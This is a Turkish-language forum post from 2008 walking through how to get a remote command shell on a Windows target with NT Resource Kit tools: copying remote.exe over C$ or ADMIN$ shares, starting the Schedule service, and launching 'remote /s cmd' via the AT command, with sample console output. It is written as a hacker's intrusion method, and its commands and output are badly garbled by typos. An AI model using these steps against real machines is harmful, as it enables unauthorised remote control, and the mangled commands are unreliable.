Remote.exe ve Rcm.exe

muhip21
13-05-2008, 22:27   |  #1  
OP Taze Üye
Teşekkür Sayısı: 0
18 mesaj
Kayıt Tarihi:Kayıt: Oca 2008

Windows NTRK 2 İLE GELEN bu uygulama sistemin uzaktan Yönetilmesine izin vermekteir. Remote.exe hem istemci hem de sunucu Olarak çalışabilir /c parametresi istemci tarafından /s parametresi ise Bir sunucu tarafından çalıştırlımalıdır Rcmd.exe uygulaması ise bir istemciilidir uzaktaki makiknaya baplanılabilmesi için yine NTRK ile gln rcmdsrv.exe Sunucusunun O makinede çalışması gerekir.

Renote.ex Uygulaması hem basittir hem de daha güçlüdür Ancak hedef makinaya kurulması için administrator ilk olarak remote.exe yi hedef sistemin versayılan yollardan (default paths) Birine kopyalaması gerekir bunun İçin n uygun metot C$ ya da AdMIN$ paylaşımlarla %systemroot% altında kopyalanmaktadır. Bu işlemden sonra Remote.exeyi çalıştırmaya gelmişdir bu amaçla Windows zamanlanmış Görevleri için kullanılan uyuglaması AT çalıştırılmalıdır Eğer hedef sistemdeki bu servis çalışmıyor ise NTRK ile gelen sc.xe UYGULAMASI İLE BUNU BAŞLATABİLİR.

[ Tüm kodu seç ] [ Yeni Pencerede Göster ]
C:/>10.2.2.2 start Scheule SERVICE_NAME: SVHEDULE Type: 10 WIN32_OWN_PROCES STAT: 2 START_PENDING WIN32_EXIT_CODE: : 0 (0X0) SRVICE_EXIT_CODE: 0 (0X) CHECKPOİİNT: 0X0 WAİT_HINT : 0X07d0 C:/>
Sunucu Kısmındaki remote.exe istemciden daha önce çalıştırılmalıdır bu nedenle hackr'ın uzak makinadaki saati öğrenmesi gerek ;
[ Tüm kodu seç ] [ Yeni Pencerede Göster ]
C:/>Net time // 10.2.2.2 curren time at// 10.2.2.2 is 26/4/2008 14:58 The command complate successfully.
Artık Sıra AT komutu İle remote.exe.yi çalıştırmaya gelmişir Arkadaşlarım :) ;
[ Tüm kodu seç ] [ Yeni Pencerede Göster ]
C:/>AT//10.2.2.2 c:/remote.exe /s cmd secret ade a new job ID:1 c:/tools>at>10.2.2.2 status ID day Time Command Line -------------------------------- 1 Today c:/remot.ex /s cm secrt C:/>Remote To start the server end of REMOTE ------------------------------- syntax: REMOT /S <CMD> <UNİQUE ID> Example: remote /s i386kd -i imbroglio to intract with this cmd from som other machine -start the cilent end by: REMOTE/C SRVER imbroglio To Exit @K (param) : /F > ForGround eg yellow black.. > (param) : /b <background color eg ıblue white> Specfies which : /u USR NAME OR GRUOPS name may connect may b specified more tha once e.g U/ user1 /U gruop2 /U user2 To start The clıent End of remote rajanthX86 wit imborrglio if there was a REMOTE /S<CMD> Started on the mahine rajnathX86 to Exit @Q (Leaves of remote server running) (param) : /L <# of lins get> C:/Remote /c 10.2.2.2 secret *********************************************************** *****************REMOTE************************************ *****************clıent************************************ *********************************************************** Connected.... Microsoft(R) cOPYRİGHT(C)
Kesinlikle alıntı değğildir Kendi elrimle yazdım..